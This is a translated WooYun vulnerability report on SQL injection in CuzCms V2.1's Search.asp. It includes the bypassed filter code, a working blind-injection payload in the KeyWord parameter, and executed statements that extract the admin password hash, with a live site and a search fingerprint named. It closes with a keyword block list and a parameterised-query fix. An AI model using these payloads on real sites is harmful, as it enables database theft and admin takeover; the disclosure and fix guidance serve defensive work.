
Vulnerability summary

Defect ID: wooyun-2015-090778

Title: SQL injection in CuzCms latest version (V2.1 release) and all earlier versions

Vendor: CuzCms

Author: goubuli

Submitted: 2015-01-12 16:27

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-01-12: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-04-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

SQL injection in CuzCms V2.1 and earlier

Details:

CuzCms (成创 website content management system) was developed by 沈阳成创网络科技有限公司 (Shenyang Chengchuang Network Technology Co., Ltd.) on Microsoft ASP with an ACCESS or MSSQL database.
SQL injection in CuzCms is filtered almost everywhere,
because Include\Conn.asp contains the CheckSql function.
Conn.asp, lines 47-101:

'================================================
'Function name: CheckSql
'Purpose: prevent SQL injection
'================================================
Function CheckSql(Str)
    If Str = "" Then
        CheckSql = ""
        Exit Function
    End If
    Str = Replace(Str,Chr(0),"", 1, -1, 1)
    Str = Replace(Str, """", "&quot;", 1, -1, 1)
    Str = Replace(Str,"<","&lt;", 1, -1, 1)
    Str = Replace(Str,">","&gt;", 1, -1, 1)
    Str = Replace(Str, "script", "&#115;cript", 1, -1, 0)
    Str = Replace(Str, "SCRIPT", "&#083;CRIPT", 1, -1, 0)
    Str = Replace(Str, "Script", "&#083;cript", 1, -1, 0)
    Str = Replace(Str, "script", "&#083;cript", 1, -1, 1)
    Str = Replace(Str, "object", "&#111;bject", 1, -1, 0)
    Str = Replace(Str, "OBJECT", "&#079;BJECT", 1, -1, 0)
    Str = Replace(Str, "Object", "&#079;bject", 1, -1, 0)
    Str = Replace(Str, "object", "&#079;bject", 1, -1, 1)
    Str = Replace(Str, "applet", "&#097;pplet", 1, -1, 0)
    Str = Replace(Str, "APPLET", "&#065;PPLET", 1, -1, 0)
    Str = Replace(Str, "Applet", "&#065;pplet", 1, -1, 0)
    Str = Replace(Str, "applet", "&#065;pplet", 1, -1, 1)
    Str = Replace(Str, "[", "&#091;")
    Str = Replace(Str, "]", "&#093;")
    Str = Replace(Str, """", "", 1, -1, 1)
    Str = Replace(Str, "=", "&#061;", 1, -1, 1)
    Str = Replace(Str, "’", "’’", 1, -1, 1)
    Str = Replace(Str, "select", "sel&#101;ct", 1, -1, 1)
    Str = Replace(Str, "execute", "&#101xecute", 1, -1, 1)
    Str = Replace(Str, "exec", "&#101xec", 1, -1, 1)
    Str = Replace(Str, "join", "jo&#105;n", 1, -1, 1)
    Str = Replace(Str, "union", "un&#105;on", 1, -1, 1)
    Str = Replace(Str, "where", "wh&#101;re", 1, -1, 1)
    Str = Replace(Str, "insert", "ins&#101;rt", 1, -1, 1)
    Str = Replace(Str, "delete", "del&#101;te", 1, -1, 1)
    Str = Replace(Str, "update", "up&#100;ate", 1, -1, 1)
    Str = Replace(Str, "like", "lik&#101;", 1, -1, 1)
    Str = Replace(Str, "drop", "dro&#112;", 1, -1, 1)
    Str = Replace(Str, "create", "cr&#101;ate", 1, -1, 1)
    Str = Replace(Str, "rename", "ren&#097;me", 1, -1, 1)
    Str = Replace(Str, "count", "co&#117;nt", 1, -1, 1)
    Str = Replace(Str, "chr", "c&#104;r", 1, -1, 1)
    Str = Replace(Str, "mid", "m&#105;d", 1, -1, 1)
    Str = Replace(Str, "truncate", "trunc&#097;te", 1, -1, 1)
    Str = Replace(Str, "nchar", "nch&#097;r", 1, -1, 1)
    Str = Replace(Str, "char", "ch&#097;r", 1, -1, 1)
    Str = Replace(Str, "alter", "alt&#101;r", 1, -1, 1)
    Str = Replace(Str, "cast", "ca&#115;t", 1, -1, 1)
    Str = Replace(Str, "exists", "e&#120;ists", 1, -1, 1)
    Str = Replace(Str,Chr(13),"<br>", 1, -1, 1)
    CheckSql = Replace(Str,"’","’’", 1, -1, 1)
End Function


Request parameters are normally wrapped in this anti-injection check, e.g. SortID = CheckSql(Int(Request.Querystring("SortID")))
After going through the whole code base, I found that Search.asp reads the KeyWord and Cuz parameters without applying the SQL check:

KeyWord = Trim(Request("KeyWord"))
Cuz = Trim(Request("Cuz"))


These are then substituted directly into the query:

datafrom="Cuz_"&Cuz
datawhere="where "&ItemRecT&" "
if SortID>0 then datawhere=datawhere&"and SortID="&SortID&" "
if KeyWord<>"" then datawhere=datawhere&"and Item1 like '%"&KeyWord&"%' "
taxis="order by ItemID desc "
sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere


Exploiting the injection requires constructing a payload, so I made the page print the SQL it executes by adding a Response.Write after each statement:
First SQL statement:

sql="select count(ItemID) as idCount from ["& datafrom &"]" & datawhere
Response.Write "<font color=red>SQL1=>"&sql&"</font><br>"


Second SQL statement:

sql="select ItemID from ["& datafrom &"] " & datawhere & taxis
Response.Write "<font color=red>SQL2=>"&sql&"</font><br>"


Third SQL statement:

sql="select * from ["& datafrom &"] where ItemID in("& sqlid &") "&taxis
Response.Write "<font color=red>SQL3=>"&sql&"</font><br>"


Entering the single keyword w, a normal search looks like this:

0108_1.png


The executed statements printed by the page are:

SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%w%'


SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%w%' order by ItemID desc


SQL3=>select * from [Cuz_News] where ItemID in(69) order by ItemID desc


After analysis, the payload is built in the KeyWord parameter; POSTing the following tests whether the user table has more than 0 rows:

Cuz=News&KeyWord=术'%20and%20IIF((select%20count(*)%20from%20Cuz_User)>0,1,0)%20and%20'a'<>'a


Result of the request:

0108_2.png


Note: if the payload is malformed or the condition yields no result, only the SQL1 statement is displayed, i.e. the query did not succeed.
As shown here:

0108_3.png


0 records displayed

Proof of vulnerability:

http://www.cuzcms.com/
Search fingerprint: powered by CuzCms

0108_4.png


Verification by reading the administrator password hash:

0108_5.png


Executed statements:

SQL1=>select count(ItemID) as idCount from [Cuz_News]where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%'
SQL2=>select ItemID from [Cuz_News] where ItemRec = True and Item1 like '%/' and IIF((select top 1 asc(mid(Item2,2,1)) from Cuz_User where Item1='admin')=97,1,0) and 'a'<>'a%' order by ItemID desc
SQL3=>select * from [Cuz_News] where ItemID in(71) order by ItemID desc


Retrieved content:
7a57a5a743894a0e
The actual stored data:

0108_6.png


Verification complete.

Fix recommendation:

Add the following to the NoSql.asp code:

N_In = "'|;|and|(|)|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare"


Ensure that parameters from every source (GET, POST, Cookie) pass through the SQL filter.
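A keyword filter such as the N_In list above only blocks known tokens; the structural fix for the Search.asp query is to bind KeyWord and SortID as query parameters and to check the Cuz table suffix against an allow-list before it becomes part of a table name. The following is an added example, not CuzCms's own code; it assumes Conn.asp exposes an open ADODB.Connection named conn and that the allowed module suffixes are those listed.

```vbscript
' Added example, not CuzCms code: parameterised version of the first
' Search.asp query. Assumes Conn.asp has opened an ADODB.Connection named
' "conn" (assumption) and that module suffixes come from a fixed list.
Const adInteger = 3          ' ADODB DataTypeEnum values, so adovbs.inc is not needed
Const adVarWChar = 202
Const adParamInput = 1

' Cuz becomes part of a table name. Identifiers cannot be bound as
' parameters, so the value is compared against an allow-list instead of
' being concatenated as received.
Function CuzTable(suffix)
    Dim allowed
    allowed = "|News|"       ' assumption: add the other real module names here
    If InStr(1, allowed, "|" & suffix & "|", vbBinaryCompare) = 0 Then
        Response.Write "Unknown module"
        Response.End
    End If
    CuzTable = "[Cuz_" & suffix & "]"
End Function

' Counts matching items. KeyWord and SortID travel as bound values, so a
' quote or an SQL keyword inside them is data and never becomes syntax.
Function CountItems(suffix, keyWord, sortID)
    Dim cmd, rs, sql
    sql = "select count(ItemID) as idCount from " & CuzTable(suffix) & _
          " where ItemRec = True and Item1 like ?"
    If sortID > 0 Then sql = sql & " and SortID = ?"

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = sql
    cmd.Parameters.Append cmd.CreateParameter("kw", adVarWChar, adParamInput, 255, "%" & keyWord & "%")
    If sortID > 0 Then cmd.Parameters.Append cmd.CreateParameter("sid", adInteger, adParamInput, , sortID)

    Set rs = cmd.Execute
    CountItems = rs("idCount")
    rs.Close
End Function

' Call site replacing the concatenated sql= line in Search.asp:
' idCount = CountItems(Cuz, KeyWord, SortID)
```

The second and third statements (the ItemID list and the final select) take the same treatment; only the ItemID in(...) list, which is built from the application's own query results rather than from request input, stays as generated.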

Copyright notice: when reposting, credit the source as goubuli@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused


Vulnerability rating:

Comments

  1. 2015-01-12 16:29 | tnt1200 ( regular white hat | Rank:121 vulnerabilities:17 | interested in aviation security.... )

    Goubuli, master!

  2. 2015-01-12 16:50 | HackBraid certified white hat ( core white hat | Rank:1545 vulnerabilities:260 | ... )

    Uppercase bypass?

  3. 2015-01-12 17:28 | goubuli ( regular white hat | Rank:324 vulnerabilities:61 )

    @tnt1200 @HackBraid Neither... the exploitable spot is rather odd.